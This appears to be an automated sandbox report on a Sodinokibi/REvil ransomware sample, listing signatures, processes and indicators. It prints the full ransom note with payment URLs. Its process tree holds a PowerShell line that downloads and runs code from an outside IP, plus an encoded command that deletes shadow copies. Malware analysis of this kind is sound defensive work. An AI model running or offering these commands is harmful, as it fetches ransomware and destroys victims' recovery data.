Analysis

  • max time kernel
    142s
  • resource
    win7v191014
  • submitted
    20-12-2019 06:10

General

  • Target

    e8kSryaf.bat

  • Sample

    191220-matk4mdz1j

  • SHA256

    632b25be71b19500300e6e3e404c0b3c7bc7f8538bc3db94fac827bb91ee848a

Malware Config

Extracted

Language ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/e8kSryaf

Extracted

Language ps1
Source

Extracted

Path

C:\7khgp2z3-readme.txt

Family

sodinokibi

Ransom Note ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 7khgp2z3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/041FB4C15C08312C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/041FB4C15C08312C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jLNvxkiCsDU96tNP+jdSNkcPED/nEUyL1PPEtpHPCVCzZp8bdGwY9sYyvwKMo4Ae QXohQ3f56IhrJQPrT5kI2DymerPLzDJuJJbFarQD1UAwLyUz06zaC1TXKmDkzkWF azfFl9jMVLdAOsoV1pc0J09JEZSMVZWPNJ+4M6+Tj2GsOkDUCVlT/bke3Q1KOp3j UcufmLPsC5psThJmIL/Qqieb3rUocN8p67o+oJqiPNnEeTVttsbHydFGfVe55ZSH BrGHsphpSGWPn5DJUlTBV8O6NlTUdKxq44Kt9Foe3QN/cGUItszetj9Y4AnAvKjW VY4Ixj7abFvWDtUxOLg7EkuZ+u6P6xlFc5LV4brAejj1RO/hBEEKwseh1TCEQvVv /MoYXeRMqD43AuKEqidLUdXS5b1LIQBT2RAApovLZcR0bticKG6ZQqS0/ulLceuc 1ToCS9CuMvJJ68qctgiwPgY0x6uBBB1/NaJu5eJcUUeoghhsRJ6MiFKW1Wih47wV wzlKw8FZnPxkUdvgVlgDNEXFS7j1xsVSsWvkSBipg5uUYI+fBuAN2eBfXj1KMy6U 0fnth5U5Ef6IHNxivXuc+DTa0gnGrhQ8B+vEUeY9zGVWJiiCk5LeEjMLoGSnUPuv +DY6+I6D9vgTaghR8zoIckMH5JNGkliM9VImOrlNBLkSiqXf+d6z6wQxdBT8p0a7 mxqGS71o2x1fTOHYiXFJnkk3rTYafWLVQFtBgrL2/Mczv2/GB/YH4teWPc5a+aK0 Q738Khb8yWb9kH4Mq1Pq70oTFzEE/oh31Jn7RecfjEzCGVkOOtY+DEe3crwZnOM5 5JzpGA/F+aFZAEVejr7dPpXGkdt6MeCnGR12CGa9Iw8U+65RCLKFamk4tHeuQn8X HLFLdN9LVOnMVRd+aqd9ogvmQikPSwyDmzGb234dd23xt3VN/l/nQf46o0RW0vKC 4w9l77cka8XvPAV3V1rx34FV5MUgvlid9Rzg23tgOqzMo085xK/61qKsEfQZeJjY jg/BFymgyOb3NEUC0s9wCGGmvieFN8NIbA2b0a4eHR+HvQeqqsh20odhfSy9G5v2 CdBQHkHnq327+z5+8RwH5yhGQ7otOPZmxYAO5RrfRom/G/PQPE83uFI33S4xHyFG mXGig0w7sn4emRpEICjBuA== Extension name: 7khgp2z3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/041FB4C15C08312C

http://decryptor.top/041FB4C15C08312C

Signatures

  • Sets desktop wallpaper using registry ⋅ 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Suspicious use of WriteProcessMemory ⋅ 2 IoCs
  • Drops file in Program Files directory ⋅ 33 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 2 IoCs
  • Discovering connected drives ⋅ 3 TTPs 7 IoCs
  • Modifies system certificate store ⋅ 2 TTPs 6 IoCs
  • Drops file in System32 directory ⋅ 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\e8kSryaf.bat"
    Suspicious use of WriteProcessMemory
    Discovering connected drives
    PID:2044
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e8kSryaf');Invoke-FRJQQICACGLPV;Start-Sleep -s 10000"
      Suspicious use of WriteProcessMemory
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Discovering connected drives
      Drops file in System32 directory
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:1436
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Suspicious behavior: EnumeratesProcesses
        Discovering connected drives
        Suspicious use of AdjustPrivilegeToken
        PID:1016
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:1884

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Execution

          Exfiltration

            Impact

            Initial Access

              Lateral Movement

                Persistence

                  Privilege Escalation

                    Replay Monitor

                    00:00 00:00

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms